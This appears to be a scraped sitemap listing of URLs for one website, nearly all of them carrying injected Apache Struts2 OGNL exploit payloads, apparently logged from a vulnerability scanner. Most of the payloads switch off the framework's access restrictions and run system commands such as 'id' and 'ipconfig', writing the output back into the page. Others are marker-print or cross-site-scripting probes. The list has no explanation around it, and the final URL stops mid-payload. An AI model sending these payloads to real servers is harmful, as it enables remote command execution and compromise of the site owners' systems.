http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html%3f&test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3f&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html%3f=fsm83812%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem59784? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?&test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?=xsstest268 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f=cmvmbgvjdgvkyw5vbnltb3vzc2vjdxjpdhkz? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?=osm49436%c0%beo1%c0%bco2a%90bcoem83113 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/fsm98848%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem26329?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/osm49436%e8%b0%b0o1%e5%85%b0o2a%e6%81%87coem83113?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f=osm49436%ef%bf%bd%ef%bf%bdo1%ef%bf%bd%ef%bf%bdo2a%ef%bf%bdbcoem83113? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?&('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?=%3c564996%20x%3d988596479%3e 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%4